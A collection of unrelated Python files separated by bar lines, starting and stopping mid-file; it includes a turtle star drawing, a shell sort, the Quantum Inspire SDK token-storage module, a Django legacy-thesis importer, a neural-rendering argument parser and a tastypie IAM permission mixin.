				"w": int(dict["preproc"]["crop"]["w"]),
				"h": int(dict["preproc"]["crop"]["h"])
			}),
			"rotate": float(dict["preproc"]["rotate"]),
			"empty": type("EmptyParam", (object,), {
				"th_original": int(dict["preproc"]["empty"]["th_original"]),
				"th_preproc": int(dict["preproc"]["empty"]["th_preproc"])
			}),
			"bgsub_stack_len": int(dict["preproc"]["bgsub_stack_len"])
		})
	def _creatable(self, obj, clsname):
		"""Wrap a single-key {name: kwargs} mapping into a parameter object."""
		k = next(iter(obj))
		return type(clsname, (object,), {
			"name": k,
			"kwargs": obj[k]
		})
|
# Draws a sequence of nested, shrinking five-pointed stars on a black
# background, cycling through three colours and flipping heading each pass.
from turtle import *
from math import *
bgcolor("black")
speed(5)
# Hide the turtle cursor while drawing.
ht()
colors = ["#FF4858", "#72F2EB", "#747F7F"]
# (x, y) is the shared centre of the figure; r is the current star radius.
x, y, r = 0, -40, 400
direction = 90
# c indexes the colour cycle.
c = 0
while r > 20:
    color(colors[c % len(colors)])
    # Move pen-up from the centre out to the star's first vertex.
    pu()
    goto(x, y)
    seth(direction)
    fd(r)
    right(162)
    pd()
    # Edge length of a star spike for radius r (presumably derived from
    # regular-pentagram geometry -- unverified).
    length = r * sin(pi * 2 / 5) / (1 + sin(pi / 10))
    begin_fill()
    # Trace the filled five-pointed star: two edges per spike,
    # turning 72 deg out and 144 deg back at each point.
    for _ in range(5):
        fd(length)
        left(72)
        fd(length)
        right(144)
    end_fill()
    # Flip heading and shrink the radius for the next nested star.
    direction += 180
    r = r * sin(pi / 10) / cos(pi / 5)
    c += 1
done()
|
def shell_sort(arr: list) -> list:
    """Sort a list in place using shell sort and return it.

    Starts with a gap of half the list length and performs a gapped
    insertion sort for each gap, halving the gap until it reaches zero.
    The previous version stepped the inner loop by 1 instead of by the
    gap, doing redundant comparisons over the whole prefix on every
    insertion; stepping by the gap restores the classic algorithm.

    Args:
        arr (list): the list to be sorted (modified in place)

    Returns:
        list: the same list object, sorted in ascending order
    """
    # Start with a coarse gap and refine it towards 1.
    gap = len(arr) // 2
    while gap > 0:
        # Gapped insertion sort: insert each element into its
        # gap-strided subsequence.
        for j in range(gap, len(arr)):
            value = arr[j]
            k = j
            # Shift larger gap-neighbours forward until value fits.
            while k >= gap and arr[k - gap] > value:
                arr[k] = arr[k - gap]
                k -= gap
            arr[k] = value
        # Make gap smaller
        gap //= 2
    return arr
|
# Quantum Inspire SDK
#
# Copyright 2018 QuTech Delft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module credentials
==================
The following functions use a resource file to store credentials information
for the user. The default location of this resource file is
:file:`.quantuminspire/qirc` in the user's home directory.
This default location is indicated with `DEFAULT_QIRC_FILE` in the following function signatures.
.. autofunction:: load_account(filename: str = DEFAULT_QIRC_FILE) -> Optional[str]
.. autofunction:: read_account(filename: str = DEFAULT_QIRC_FILE) -> Optional[str]
.. autofunction:: store_account(token: str, filename: str = DEFAULT_QIRC_FILE, overwrite: bool = False) -> None
.. autofunction:: delete_account(token: str, filename: str = DEFAULT_QIRC_FILE) -> None
.. autofunction:: save_account(token: str, filename: str = DEFAULT_QIRC_FILE) -> None
.. autofunction:: enable_account
.. autofunction:: get_token_authentication
.. autofunction:: get_basic_authentication
"""
import warnings
import os
import json
from typing import Optional
from coreapi.auth import BasicAuthentication, TokenAuthentication
DEFAULT_QIRC_FILE = os.path.join(os.path.expanduser("~"), '.quantuminspire', 'qirc')
def load_account(filename: str = DEFAULT_QIRC_FILE) -> Optional[str]:
    """ Locate a previously stored Quantum Inspire token.

    The token is looked up in two places, in this order:

    1. The environment variable (:envvar:`QI_TOKEN`).
    2. The resource file `filename` or, when not given, the default resource
       file :file:`.quantuminspire/qirc` in the user's home directory.

    :param filename: full path to the resource file. If no `filename` is given, the default resource file
        :file:`.quantuminspire/qirc` in the user's home directory is used.
    :return:
        The Quantum Inspire token or None when no token is found.
    """
    env_token = os.environ.get('QI_TOKEN')
    if env_token:
        return env_token
    return read_account(filename)
def read_account(filename: str = DEFAULT_QIRC_FILE) -> Optional[str]:
    """ Read a previously stored Quantum Inspire token from a resource file.

    This method looks for the token in the file with `filename` given or, when no
    `filename` is given, in the default resource file :file:`.quantuminspire/qirc`
    in the user's home directory.

    :param filename: full path to the resource file. If no filename is given, the default resource file
        :file:`.quantuminspire/qirc` in the user's home directory is used.
    :return:
        The Quantum Inspire token or None when no token is found or token is empty.
    """
    token: Optional[str]
    try:
        with open(filename, 'r') as fp:
            token = json.load(fp)['token']
    except (OSError, KeyError, ValueError):
        # Missing file, missing key, or malformed JSON all mean "no token".
        token = None
    return token or None
def store_account(token: str, filename: str = DEFAULT_QIRC_FILE, overwrite: bool = False) -> None:
    """Persist the token in a resource file.

    A different, already stored token is only replaced when overwrite=True.

    :param token: the Quantum Inspire token to store to disk.
    :param filename: full path to the resource file. If no `filename` is given, the default resource file
        :file:`.quantuminspire/qirc` in the user's home directory is used.
    :param overwrite: overwrite an existing token.
    """
    existing = read_account(filename)
    if existing and not overwrite and existing != token:
        warnings.warn('Token already present. Set overwrite=True to overwrite.')
        return
    save_account(token, filename)
def delete_account(token: str, filename: str = DEFAULT_QIRC_FILE) -> None:
    """Remove the token from the resource file by blanking it out.

    Only acts when the stored token matches `token`.

    :param token: the Quantum Inspire token to remove.
    :param filename: full path to the resource file. If no `filename` is given, the default resource file
        :file:`.quantuminspire/qirc` in the user's home directory is used.
    """
    if read_account(filename) == token:
        save_account('', filename)
def save_account(token: str, filename: str = DEFAULT_QIRC_FILE) -> None:
    """Write the token to `filename`, unconditionally overwriting it.

    Use :meth:`~.store_account` to avoid replacing an existing token.

    :param token: the Quantum Inspire token to save.
    :param filename: full path to the resource file. If no `filename` is given, the default resource file
        :file:`.quantuminspire/qirc` in the user's home directory is used.
    """
    # Ensure the containing directory exists before writing.
    os.makedirs(os.path.dirname(filename), exist_ok=True)
    with open(filename, 'w') as config_file:
        json.dump({'token': token}, config_file, indent=2)
def enable_account(token: str) -> None:
    """Expose the token via the process environment for this session.

    :meth:`~.load_account` checks :envvar:`QI_TOKEN` first, so this token
    takes precedence over any token stored on disk; a token already loaded
    from the system environment is overwritten. The system environment
    itself is not affected.

    :param token: the Quantum Inspire token to be used by :meth:`~.load_account` for the session.
    """
    os.environ['QI_TOKEN'] = token
def get_token_authentication(token: Optional[str] = None) -> TokenAuthentication:
    """Set up token authentication for Quantum Inspire to be used in the API.

    :param token: the Quantum Inspire token to set in TokenAuthentication. When no token is given,
        the token returned from :meth:`~.load_account` is used.
    :return:
        The token authentication for Quantum Inspire.
    """
    # Fall back to the stored/environment token when none is supplied.
    return TokenAuthentication(token or load_account(), scheme="token")
def get_basic_authentication(email: str, password: str) -> BasicAuthentication:
    """Set up basic authentication for Quantum Inspire to be used in the API.

    :param email: a valid email address.
    :param password: password for the account.
    :return:
        The basic authentication for Quantum Inspire.
    """
    credentials = BasicAuthentication(email, password)
    return credentials
|
import sqlite3
from django.contrib.auth.models import Group
from django.core.management.base import BaseCommand
from django.db import transaction
from django.utils.dateparse import parse_date
from apps.accounts.models import User
from apps.thesis.models import Thesis, Category
class Command(BaseCommand):
    """Import thesis records from a legacy SQLite database into the new models."""
    help = "Loads legacy data."
    def __init__(self, **kwargs):
        super().__init__(**kwargs)
        # SQLite connection is opened lazily in handle().
        self._conn = None
        # Ensure the student/teacher groups exist before any import runs.
        self._student_group = Group.objects.get_or_create(name='student')[0]
        self._teacher_group = Group.objects.get_or_create(name='teacher')[0]
    def add_arguments(self, parser):
        # Path to the legacy SQLite database file.
        parser.add_argument('file')
    @transaction.atomic
    def handle(self, *args, **options):
        """Import all legacy rows in one transaction, skipping known records."""
        self._conn = sqlite3.connect(options.get('file'))
        self._conn.row_factory = sqlite3.Row
        # Join the opponent/supervisor names (oponent/vedouci) onto each book row.
        r = self._conn.execute("""
            SELECT k.*,
                   o.jmeno as o_jmeno,
                   v.jmeno as v_jmeno
            FROM knihy k
                   inner join oponenti o ON k.oponent = o.id
                   inner join oponenti v ON k.vedouci = v.id
            order by k.ID;
        """)
        # ['ID', 'ev_cislo', 'prace', 'ajmeno', 'vedouci', 'oponent', 'edatum', 'rok', 'typ', 'datumpridani', 'trida', 'souhlas', 'stav', 'abstrakt']
        # [152, 'S156', 'Syndrom CAN', 'And Klára ', 30, 1, '2015-04-13', '2012-04-01', 'SL', '2015-04-13',
        #  'L4', 1, 'Dostupná', None]
        for row in r.fetchall():  # type: sqlite3.Row
            # Skip rows already imported (registration number is the legacy key).
            if Thesis.objects.filter(registration_number=row['ev_cislo']).exists():
                continue
            print(tuple(row))
            # Keep the full legacy row in `note` for traceability.
            t = Thesis(
                registration_number=row['ev_cislo'],
                title=row['prace'],
                category=Category.objects.get_or_create(title=row['typ'])[0],
                published_at=parse_date(row['rok']),
                reservable=str(row['souhlas']) == '1',
                state=Thesis.State.PUBLISHED,
                note=dict(imported_from=tuple(row))
            )
            t.supervisor = User.objects.get_or_create_from_name(name=row['v_jmeno'], thesis_id=None)[0]
            t.opponent = User.objects.get_or_create_from_name(name=row['o_jmeno'], thesis_id=None)[0]
            # Add to the teacher group only when the user was actually resolved.
            t.opponent and self._teacher_group.user_set.add(t.opponent)
            t.supervisor and self._teacher_group.user_set.add(t.supervisor)
            # 'ajmeno' holds a comma-separated list of author names.
            for name in row['ajmeno'].split(','):
                author = User.objects.get_or_create_from_name(name=name, thesis_id=row['ID'])[0]
                author.school_class = row['trida']
                self._student_group.user_set.add(author)
                t.authors.add(author)
                author.save(update_fields=['school_class'])
            t.save()
        self._teacher_group.save()
        self._student_group.save()
        self._fix_wrong_users()
    def _fix_wrong_users(self):
        """Merge duplicate teacher accounts created with academic titles.

        Users whose first name contains a title (Ing./Mgr.) are remapped to
        the titled-free teacher with the same last name, then deleted.
        """
        for user in User.objects.filter(first_name__iregex=r'(Ing|Mgr)\.'):
            try:
                correct = User.objects.exclude(id=user.id).exclude(
                    first_name__contains='.',
                ).get(
                    groups=self._teacher_group,
                    last_name=user.last_name,
                )
            except User.MultipleObjectsReturned:
                print('Cannot fix, multiple targets', user)
                continue
            except User.DoesNotExist:
                print('Cannot fix, not found correct', user)
                continue
            # Re-point all theses to the canonical account before deleting.
            Thesis.objects.filter(opponent=user).update(opponent=correct)
            Thesis.objects.filter(supervisor=user).update(supervisor=correct)
            user.groups.set([])
            user.delete()
|
from context import openrefine_wrench
# Expected option dict produced by _prep_options for a CSV import where
# custom_options merges in an encoding and a "#" separator.
wanted = {
    "columnWidths": None,
    "encoding": "UTF-8",
    "guessCellValueTypes": False,
    "headerLines": None,
    "header_lines": 1,
    "ignoreLines": None,
    "ignore_lines": -1,
    "includeFileSources": False,
    "limit": -1,
    "linesPerRow": None,
    "processQuotes": True,
    "projectName": None,
    "projectTags": None,
    "recordPath": None,
    "separator": "#",
    "sheets": None,
    "skipDataLines": None,
    "skip_data_lines": 0,
    "storeBlankCellsAsNulls": True,
    "storeBlankRows": True,
    "storeEmptyStrings": True,
    "trimStrings": False}
def test_prep_options():
    """_prep_options merges custom JSON options over the CSV defaults."""
    custom = '{"encoding": "UTF-8", "separator": "#"}'
    result = openrefine_wrench._prep_options(
        source_format="csv",
        record_path=None,
        columns_separator=",",
        encoding=None,
        custom_options=custom)
    assert result == wanted
|
import configargparse
def config_parser():
    """Build the configargparse parser holding every experiment option.

    Options are grouped into: base experiment config, auxiliary tools,
    training, network architecture, rendering, importance/depth sampling,
    ToF rendering, dataset and logging options.

    :return: the configured ArgumentParser (not yet parsed).
    """
    ## Base experiment config
    parser = configargparse.ArgumentParser()
    parser.add_argument('--config', is_config_file=True, help='config file path')
    parser.add_argument("--expname", type=str, help='experiment name')
    parser.add_argument("--basedir", type=str, default='./logs/', help='where to store ckpts and logs')
    parser.add_argument("--datadir", type=str, default='/data/unrolled/datasets/hypersim', help='input data directory')
    parser.add_argument("--dataset_type", type=str, default='hypersim', help='options: llff / blender / deepvoxels')
    # Fixed help text: it was mistakenly copied from --num_views.
    parser.add_argument("--scan", type=str, default='ai_001_001', help='scene/scan name to load from the dataset')
    ## Auxiliary
    parser.add_argument("--show_images", action='store_true', help='Show images before training')
    parser.add_argument("--depth_splat", action='store_true', help='Depth splat visualization before training')
    parser.add_argument("--eval_only", action='store_true', help='Only eval')
    parser.add_argument("--render_freezeframe", action='store_true', help='Render freezeframe outputs')
    parser.add_argument("--render_only", action='store_true', help='Only perform render')
    parser.add_argument("--focus_distance", type=float, default=-1.0, help='Focus distance for rendering')
    parser.add_argument("--rad_multiplier_x", type=float, default=1.0, help='Radius multiplier for spiral')
    parser.add_argument("--rad_multiplier_y", type=float, default=1.0, help='Radius multiplier for spiral')
    parser.add_argument("--rad_multiplier_z", type=float, default=1.0, help='Radius multiplier for spiral')
    parser.add_argument("--tof_image_width", type=int, default=512, help='Image width')
    parser.add_argument("--tof_image_height", type=int, default=512, help='Image height')
    parser.add_argument("--color_image_width", type=int, default=512, help='Image width')
    parser.add_argument("--color_image_height", type=int, default=512, help='Image height')
    ## Training options
    parser.add_argument("--N_iters", type=int, default=100000, help='Number of optimization iters')
    parser.add_argument("--N_rand", type=int, default=32*32*4, help='batch size (number of random rays per gradient step)')
    parser.add_argument("--lrate", type=float, default=5e-4, help='learning rate')
    parser.add_argument("--lrate_calib", type=float, default=1e-3, help='learning rate')
    parser.add_argument("--lrate_calib_fac", type=float, default=0.5, help='learning rate')
    parser.add_argument("--lrate_decay", type=int, default=250, help='exponential learning rate decay (in 1000s)')
    parser.add_argument("--lrate_decay_calib", type=int, default=150, help='exponential learning rate decay (in 1000s)')
    parser.add_argument("--chunk", type=int, default=1024*32, help='number of rays processed in parallel, decrease if running out of memory')
    parser.add_argument("--netchunk", type=int, default=1024*64, help='number of pts sent through network in parallel, decrease if running out of memory')
    parser.add_argument("--no_batching", action='store_true', help='only take random rays from 1 image at a time')
    parser.add_argument("--no_reload", action='store_true', help='do not reload weights from saved ckpt')
    parser.add_argument("--ft_path", type=str, default=None, help='specific weights npy file to reload for coarse network')
    parser.add_argument("--random_seed", type=int, default=None, help='fix random seed for repeatability')
    parser.add_argument("--num_views", type=int, default=16, help='Num views to use')
    parser.add_argument("--total_num_views", type=int, default=200, help='Total number of views in dataset')
    parser.add_argument("--view_step", type=int, default=1, help='Training view step')
    parser.add_argument("--view_start", type=int, default=0, help='Training view start')
    parser.add_argument("--val_start", type=int, default=61, help='Validation view index start')
    parser.add_argument("--val_end", type=int, default=122, help='Validation view index end')
    parser.add_argument("--optimize_poses", action='store_true', help='Optimize poses')
    parser.add_argument("--optimize_relative_pose", action='store_true', help='Optimize relative pose')
    parser.add_argument("--optimize_phase_offset", action='store_true', help='Optimize phase offset')
    parser.add_argument("--noisy_pose_initialization", action='store_true', help='Noisy initialization for poses')
    parser.add_argument("--identity_pose_initialization", action='store_true', help='Identity initialization for poses')
    parser.add_argument("--use_relative_poses", action='store_true', help='Use relative poses')
    parser.add_argument("--collocated_pose", action='store_true', help='Colocated source and camera')
    parser.add_argument("--use_depth_loss", action='store_true', help='Use direct depth loss')
    parser.add_argument("--depth_weight", type=float, default=0.0, help='Direct depth loss weight')
    parser.add_argument("--depth_weight_decay", type=float, default=1.0, help='Decay for depth weight')
    parser.add_argument("--depth_weight_decay_steps", type=int, default=30, help='Apply depth weight decay after this many steps')
    parser.add_argument("--sparsity_weight", type=float, default=0.0, help='Weight for loss encouraging sparsity')
    parser.add_argument("--sparsity_weight_decay", type=float, default=1.0, help='Decay for sparsity weight')
    parser.add_argument("--sparsity_weight_decay_steps", type=int, default=30, help='Apply sparsity weight decay after this many steps')
    parser.add_argument("--train_both", action='store_true', help='Train color and ToF separately')
    # Fixed help typo: "look u p" -> "look up".
    parser.add_argument("--no_phase_calib_iters", type=int, default=5000, help='Iters before adding phase look up table optimization')
    parser.add_argument("--no_phase_iters", type=int, default=1000000, help='Iters before adding phase bias prediction')
    parser.add_argument("--no_color_iters", type=int, default=0, help='Iters before color loss optimization')
    parser.add_argument("--calibration_pretraining", action='store_true', help='Use calibration (static scene) pretraining')
    parser.add_argument("--reset_static_model", action='store_true', help='Reset static model after static pre-training')
    parser.add_argument("--color_weight", type=float, default=1.0, help='Color loss weight')
    parser.add_argument("--pose_reg_weight", type=float, default=0.0, help='Pose regularization loss weight')
    parser.add_argument("--tof_weight", type=float, default=1.0, help='ToF loss weight')
    parser.add_argument("--tof_weight_decay", type=float, default=1.0, help='ToF weight decay multiplier')
    parser.add_argument("--tof_weight_decay_steps", type=int, default=30, help='How many steps before ToF weight decay')
    ## Network architecture
    parser.add_argument("--dynamic", action='store_true', help='Optimize a dynamic scene representation')
    parser.add_argument("--single_dynamic_model", action='store_true', help='Single model for both static and dynamic content')
    parser.add_argument("--fix_view", action='store_true', help='Assume a fixed view')
    parser.add_argument("--latent_code_size", type=int, default=256, help='size of render feature vector')
    parser.add_argument("--num_frames", type=int, default=8, help='Number of frames in sequence')
    parser.add_argument("--model_reset_iters", type=int, default=0, help='How many iters before model reset')
    parser.add_argument("--static_scene_iters", type=int, default=0, help='How many iters to optimize static scene')
    parser.add_argument("--use_static_loss", action='store_true', help='Static scene loss')
    parser.add_argument("--find_visible", action='store_true', help='Do not render content outside of view for a given time step (expensive)')
    parser.add_argument("--tofnetdepth", type=int, default=4, help='layers in network')
    parser.add_argument("--tofnetwidth", type=int, default=64, help='channels per layer')
    parser.add_argument("--tofnetdepth_fine", type=int, default=8, help='layers in fine network')
    parser.add_argument("--tofnetwidth_fine", type=int, default=64, help='channels per layer in fine network')
    parser.add_argument("--phasenetdepth", type=int, default=4, help='Net depth for look up table model')
    parser.add_argument("--phasenetwidth", type=int, default=128, help='Net width for look up table model')
    parser.add_argument("--colornetdepth", type=int, default=4, help='layers in network')
    parser.add_argument("--colornetwidth", type=int, default=64, help='channels per layer')
    parser.add_argument("--colornetdepth_fine", type=int, default=8, help='layers in fine network')
    parser.add_argument("--colornetwidth_fine", type=int, default=64, help='channels per layer in fine network')
    parser.add_argument("--netdepth", type=int, default=8, help='layers in network')
    parser.add_argument("--netwidth", type=int, default=256, help='channels per layer')
    parser.add_argument("--netdepth_fine", type=int, default=8, help='layers in fine network')
    parser.add_argument("--netwidth_fine", type=int, default=256, help='channels per layer in fine network')
    ## Rendering options
    parser.add_argument("--N_samples", type=int, default=64, help='number of coarse samples per ray')
    parser.add_argument("--N_shadow_samples", type=int, default=64, help='number of coarse samples per ray')
    parser.add_argument("--N_depth_samples", type=int, default=16, help='number of coarse samples per ray')
    parser.add_argument("--N_importance", type=int, default=0, help='number of additional fine samples per ray')
    parser.add_argument("--perturb", type=float, default=1., help='set to 0. for no jitter, 1. for jitter')
    parser.add_argument("--use_viewdirs", action='store_true', help='use full 5D input instead of 3D')
    parser.add_argument("--i_embed", type=int, default=0, help='set 0 for default positional encoding, -1 for none')
    parser.add_argument("--multires", type=int, default=10, help='log2 of max freq for positional encoding (3D location)')
    parser.add_argument("--multires_views", type=int, default=4, help='log2 of max freq for positional encoding (2D direction)')
    parser.add_argument("--multires_pix", type=int, default=2, help='log2 of max freq for positional encoding (2D direction) for phase look up table model')
    parser.add_argument("--raw_noise_std", type=float, default=0., help='std dev of noise added to regularize sigma_a output, 1e0 recommended')
    parser.add_argument("--render_test", action='store_true', help='render the test set instead of render_poses path')
    parser.add_argument("--render_factor", type=int, default=0, help='downsampling factor to speed up rendering, set 4 or 8 for fast preview')
    # Importance sampling
    parser.add_argument("--use_importance_sampling", action='store_true', help='Use error importance sampling for training')
    parser.add_argument("--importance_sampling_start", type=int, default=20000, help='When to start importance sampling')
    # Filled in the previously empty help string.
    parser.add_argument("--importance_sampling_interval", type=int, default=10000, help='Importance sampling interval')
    parser.add_argument("--importance_sampling_freq", type=int, default=2, help='How often to importance sample')
    # Depth sampling
    parser.add_argument("--use_depth_sampling", action='store_true', help='Sample about ground truth depth')
    parser.add_argument("--depth_sampling_exclude_interval", type=int, default=1, help='No depth sampling every X iterations')
    parser.add_argument("--depth_sampling_range", type=float, default=0.1, help='depth range for tof camera')
    parser.add_argument("--base_uncertainty", type=float, default=1e-5, help='Base uncertainty for sampling')
    parser.add_argument("--depth_sampling_range_min", type=float, default=0.1, help='minimum depth sampling range')
    # ToF rendering
    parser.add_argument("--square_transmittance", action='store_true', help='Square transmittance for forward model')
    parser.add_argument("--use_falloff", action='store_true', help='Use r^2 falloff')
    parser.add_argument("--use_phasor", action='store_true', help='Phasor output for ToF model')
    parser.add_argument("--use_phase_calib", action='store_true', help='Use phase look up table MLP')
    parser.add_argument("--use_tof_uncertainty", action='store_true', help='Use tof albedo for coarse sampling')
    parser.add_argument("--use_variance_weighting", action='store_true', help='Use variance weighted loss')
    parser.add_argument("--bias_range", type=float, default=50., help='When the model regresses phase bias, this sets the bias range')
    parser.add_argument("--phase_offset", type=float, default=0., help='Base phase offset for ToF phase')
    parser.add_argument("--depth_range", type=float, default=-1., help='depth range for tof camera')
    parser.add_argument("--min_depth_fac", type=float, default=0.01, help='Used to calculate sampling range for ToF datasets')
    parser.add_argument("--max_depth_fac", type=float, default=1.0, help='Used to calculate sampling range for ToF datasets')
    parser.add_argument("--scene_scale", type=float, default=1., help='Scene scale')
    parser.add_argument("--scene_scale_x", type=float, default=2., help='Scene scale multiplier x direction')
    parser.add_argument("--scene_scale_y", type=float, default=2., help='Scene scale multiplier y direction')
    parser.add_argument("--falloff_range", type=float, default=16., help='Falloff range')
    ## Dataset options
    parser.add_argument("--testskip", type=int, default=8, help='will load 1/N images from test/val sets, useful for large datasets like deepvoxels')
    parser.add_argument("--tof_scale_factor", type=float, default=1.0, help='downsample factor for images')
    parser.add_argument("--color_scale_factor", type=float, default=1.0, help='downsample factor for images')
    parser.add_argument("--no_ndc", action='store_true', help='do not use normalized device coordinates (set for non-forward facing scenes)')
    parser.add_argument("--lindisp", action='store_true', help='sampling linearly in disparity rather than depth')
    parser.add_argument("--spherify", action='store_true', help='set for spherical 360 scenes')
    parser.add_argument("--autoholdout", type=int, default=8, help='will take every 1/N images as LLFF test set, paper uses 8')
    parser.add_argument("--train_views", type=str, default="", help='Views to use for training')
    parser.add_argument("--render_extrinsics_file", type=str, default="", help='File to load render extrinsics from')
    parser.add_argument("--render_extrinsics_scale", type=float, default=1.1, help='Scale render extrinsics (if loaded from file)')
    parser.add_argument("--reverse_render_extrinsics", action='store_true', help='Reverse order of render extrinsics')
    # Fixed help text: it was mistakenly copied from --autoholdout.
    parser.add_argument("--val_split_file", type=str, default="", help='File listing the views of the validation split')
    # Blender flags
    parser.add_argument("--white_bkgd", action='store_true', help='set to render synthetic data on a white bkgd (always use for dvoxels)')
    parser.add_argument("--half_res", action='store_true', help='load blender synthetic data at 400x400 instead of 800x800')
    parser.add_argument("--static_blend_weight", action='store_true', help='use static blending weight')
    ## Logging / saving options
    parser.add_argument("--print_extras", action='store_true', help='Print extra variables')
    parser.add_argument("--i_print", type=int, default=100, help='frequency of console printout and metric logging')
    parser.add_argument("--i_img", type=int, default=500, help='frequency of tensorboard image logging')
    parser.add_argument("--i_testset", type=int, default=1000, help='frequency of testset saving')
    parser.add_argument("--i_save", type=int, default=10000, help='frequency of weight ckpt saving')
    parser.add_argument("--i_video", type=int, default=50000, help='frequency of render_poses video saving')
    return parser
|
from nanopore.mappers.abstractMapper import AbstractMapper
from nanopore.mappers.last import Last
from sonLib.bioio import system, fastaRead, fastqRead, fastaWrite
import os
class LastParams(Last):
    """Last aligner run with tuned scoring parameters."""
    def run(self):
        Last.run(self, params="-s 2 -T 0 -Q 0 -a 1")
class LastParamsChain(LastParams):
    """LastParams followed by chaining of the resulting SAM file."""
    def run(self):
        LastParams.run(self)
        self.chainSamFile()
class LastParamsRealign(LastParams):
    """LastParams followed by realignment of the resulting SAM file."""
    def run(self):
        LastParams.run(self)
        self.realignSamFile()
class LastParamsRealignEm(LastParams):
    """LastParams with EM-trained realignment and custom gamma parameters."""
    def run(self):
        LastParams.run(self)
        self.realignSamFile(doEm=True, gapGamma=0.5, matchGamma=0.0)
class LastParamsRealignTrainedModel(LastParams):
    """LastParams with realignment using the default pre-trained model."""
    def run(self):
        LastParams.run(self)
        self.realignSamFile(useTrainedModel=True)
class LastParamsRealignTrainedModel20(LastParams):
    """LastParams with realignment using the blasr_hmm_20 trained model."""
    def run(self):
        LastParams.run(self)
        self.realignSamFile(useTrainedModel=True, trainedModelFile="blasr_hmm_20.txt")
class LastParamsRealignTrainedModel40(LastParams):
    """LastParams with realignment using the blasr_hmm_40 trained model."""
    def run(self):
        LastParams.run(self)
        self.realignSamFile(useTrainedModel=True, trainedModelFile="blasr_hmm_40.txt")
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making 蓝鲸智云PaaS平台社区版 (BlueKing PaaS Community
Edition) available.
Copyright (C) 2017-2020 THL A29 Limited, a Tencent company. All rights reserved.
Licensed under the MIT License (the "License"); you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://opensource.org/licenses/MIT
Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
specific language governing permissions and limitations under the License.
"""
import six
import abc
import logging
from iam import Action, MultiActionRequest
logger = logging.getLogger("iam")
@six.add_metaclass(abc.ABCMeta)
class IAMResourceHelper(object):
    """Abstract adapter that tells IAMResourceMixin how to describe a
    tastypie resource to the IAM permission service.

    Concrete subclasses map a tastypie bundle to IAM resource objects and
    supply the subject/environment for permission queries.
    """
    def __init__(self, iam, system, actions):
        # iam: IAM client used to issue permission queries.
        # system: IAM system id the resources belong to.
        # actions: list of action ids to query for each resource.
        self.iam = iam
        self.system = system
        self.actions = actions
    @abc.abstractmethod
    def get_resources(self, bundle):
        """Return the list of IAM resource objects for *bundle*."""
        raise NotImplementedError()
    @abc.abstractmethod
    def get_resources_id(self, bundle):
        """Return the id used to key permission results for *bundle*."""
        raise NotImplementedError()
    @abc.abstractmethod
    def get_subject_for_alter_list(self, request, data):
        """Return the IAM subject for a list-view permission query."""
        raise NotImplementedError()
    @abc.abstractmethod
    def get_environment_for_alter_list(self, request, data):
        """Return the IAM environment for a list-view permission query."""
        raise NotImplementedError()
    @abc.abstractmethod
    def get_subject_for_alter_detail(self, request, data):
        """Return the IAM subject for a detail-view permission query."""
        raise NotImplementedError()
    @abc.abstractmethod
    def get_environment_for_alter_detail(self, request, data):
        """Return the IAM environment for a detail-view permission query."""
        raise NotImplementedError()
class IAMResourceMixin(object):
    """Tastypie resource mixin that annotates serialized data with the IAM
    actions the requesting user is allowed to perform (``auth_actions``).

    Requires ``iam_resource_helper`` (an IAMResourceHelper) on the
    resource's ``_meta``; without it the data passes through unchanged.
    """
    def alter_list_data_to_serialize(self, request, data):
        """Attach ``auth_actions`` to every bundle in a list response."""
        helper = getattr(self._meta, "iam_resource_helper", None)
        if not helper:
            return data
        # 1. collect resources
        resources_list = []
        for bundle in data["objects"]:
            resources_list.append(helper.get_resources(bundle))
        if not resources_list:
            return data
        # 2. make request (named iam_request so the Django `request`
        # argument is not shadowed)
        iam_request = MultiActionRequest(
            helper.system,
            helper.get_subject_for_alter_list(request, data),
            [Action(action) for action in helper.actions],
            [],
            helper.get_environment_for_alter_list(request, data),
        )
        resource_actions_allowed = helper.iam.batch_resource_multi_actions_allowed(iam_request, resources_list)
        logger.debug(
            "tastypie alter_list_data_to_serialize batch_resource_multi_actions_allowed request({}) result: {}".format(
                iam_request.to_dict(), resource_actions_allowed
            )
        )
        # 3. assemble action allowed data
        for bundle in data["objects"]:
            rid = str(helper.get_resources_id(bundle))
            bundle.data["auth_actions"] = [
                action for action, allowed in resource_actions_allowed.get(rid, {}).items() if allowed
            ]
        return data
    def alter_detail_data_to_serialize(self, request, data):
        """Attach ``auth_actions`` to a single-object response."""
        helper = getattr(self._meta, "iam_resource_helper", None)
        if not helper:
            return data
        bundle = data
        # 1. get resources
        resources = helper.get_resources(bundle)
        # 2. make request (avoid shadowing the Django `request` argument)
        iam_request = MultiActionRequest(
            helper.system,
            helper.get_subject_for_alter_detail(request, data),
            [Action(action) for action in helper.actions],
            resources,
            helper.get_environment_for_alter_detail(request, data),
        )
        actions_allowed = helper.iam.resource_multi_actions_allowed(iam_request)
        logger.debug(
            "tastypie alter_detail_data_to_serialize resource_multi_actions_allowed request({}) result: {}".format(
                iam_request.to_dict(), actions_allowed
            )
        )
        # 3. assemble action allowed data
        bundle.data["auth_actions"] = [action for action, allowed in actions_allowed.items() if allowed]
        return data
|
import numpy as np
from sklearn.metrics import average_precision_score
def load_data(data_path):
    """Load the train/test split stored in an .npz archive.

    Returns (X_train, y_train, X_test, y_test).
    """
    archive = np.load(data_path)
    return tuple(archive[key] for key in ("X_train", "y_train", "X_test", "y_test"))
def calculate_average_precision(label, index, similarity, num_search_sample):
    """Calculate the average precision of a similarity-search result.

    The average precision is computed for each of the first
    num_search_sample queries and returned as a list.
    """
    neighbour_labels = np.array([label[idx] for idx in index])
    # 1 where a neighbour's label matches column 0 (presumably the query
    # itself), 0 otherwise; column 0 is then dropped.
    relevance = np.array([np.where(row == row[0], 1, 0) for row in neighbour_labels])
    relevance = relevance[:, 1:]
    return [average_precision_score(relevance[i], similarity[i])
            for i in range(num_search_sample)]
|
from random import randrange
from time import sleep
import pygame
import sys
try:
    pygame.init()
except:
    # NOTE(review): bare except keeps the script alive if pygame cannot
    # start, but everything below will still fail without a display.
